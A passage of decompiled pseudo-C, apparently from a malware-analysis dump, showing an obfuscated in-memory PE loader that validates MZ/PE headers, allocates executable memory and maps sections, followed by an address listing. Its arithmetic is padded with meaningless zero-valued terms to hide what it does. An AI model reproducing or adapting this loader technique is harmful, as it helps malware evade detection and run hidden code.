				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}







































































































































































                                                                                                            0x10005263
                                                                                                            0x10005269
                                                                                                            0x10005271
                                                                                                            0x10005278
                                                                                                            0x10005291
                                                                                                            0x1000529e
                                                                                                            0x100052a9
                                                                                                            0x100052b4
                                                                                                            0x100052bf
                                                                                                            0x100052d2
                                                                                                            0x100052da
                                                                                                            0x10005304
                                                                                                            0x1000530c
                                                                                                            0x10006014
                                                                                                            0x1000601a
                                                                                                            0x10005312
                                                                                                            0x10005312
                                                                                                            0x10005318
                                                                                                            0x1000531b
                                                                                                            0x10005321
                                                                                                            0x10005324
                                                                                                            0x1000533f
                                                                                                            0x10005350
                                                                                                            0x10005361
                                                                                                            0x00000000
                                                                                                            0x10005367
                                                                                                            0x1000536c
                                                                                                            0x1000536f
                                                                                                            0x10005377
                                                                                                            0x1000537d
                                                                                                            0x10005392
                                                                                                            0x100053db
                                                                                                            0x100053f4
                                                                                                            0x10005409
                                                                                                            0x00000000
                                                                                                            0x1000540f
                                                                                                            0x1000540f
                                                                                                            0x10005434
                                                                                                            0x10005436
                                                                                                            0x10005444
                                                                                                            0x10005466
                                                                                                            0x1000546d
                                                                                                            0x10005477
                                                                                                            0x10005484
                                                                                                            0x10005488
                                                                                                            0x00000000
                                                                                                            0x1000548e
                                                                                                            0x1000548e
                                                                                                            0x100054b4
                                                                                                            0x100054cb
                                                                                                            0x00000000
                                                                                                            0x100054d1
                                                                                                            0x100054d4
                                                                                                            0x100054d8
                                                                                                            0x100054ec
                                                                                                            0x10005505
                                                                                                            0x00000000
                                                                                                            0x1000550b
                                                                                                            0x1000550b
                                                                                                            0x1000551b
                                                                                                            0x10005537
                                                                                                            0x10005542
                                                                                                            0x1000555f
                                                                                                            0x10005575
                                                                                                            0x10005579
                                                                                                            0x1000557d
                                                                                                            0x10005592
                                                                                                            0x10005594
                                                                                                            0x100056bc
                                                                                                            0x100056c2
                                                                                                            0x1000559a
                                                                                                            0x100055a5
                                                                                                            0x100055b0
                                                                                                            0x100055b4
                                                                                                            0x100055ba
                                                                                                            0x100055be
                                                                                                            0x100055c4
                                                                                                            0x100055c8
                                                                                                            0x100055cd
                                                                                                            0x100055d1
                                                                                                            0x1000563e
                                                                                                            0x10005642
                                                                                                            0x100055d3
                                                                                                            0x100055e1
                                                                                                            0x100055ec
                                                                                                            0x10005600
                                                                                                            0x10005600
                                                                                                            0x10005650
                                                                                                            0x10005654
                                                                                                            0x10005699
                                                                                                            0x10005656
                                                                                                            0x10005656
                                                                                                            0x10005686
                                                                                                            0x10005693
                                                                                                            0x10005693
                                                                                                            0x100056a3
                                                                                                            0x100056ac
                                                                                                            0x100056b0
                                                                                                            0x100056b0
                                                                                                            0x100056b0
                                                                                                            0x100056ba
                                                                                                            0x100056cf
                                                                                                            0x100056fb
                                                                                                            0x10005701
                                                                                                            0x10005706
                                                                                                            0x1000570c
                                                                                                            0x10005712
                                                                                                            0x10005724
                                                                                                            0x10005753
                                                                                                            0x10005757
                                                                                                            0x1000575c
                                                                                                            0x10005765
                                                                                                            0x10005770
                                                                                                            0x10005783
                                                                                                            0x10005788
                                                                                                            0x10005797
                                                                                                            0x1000579d
                                                                                                            0x100057a1
                                                                                                            0x100057b3
                                                                                                            0x100057cf
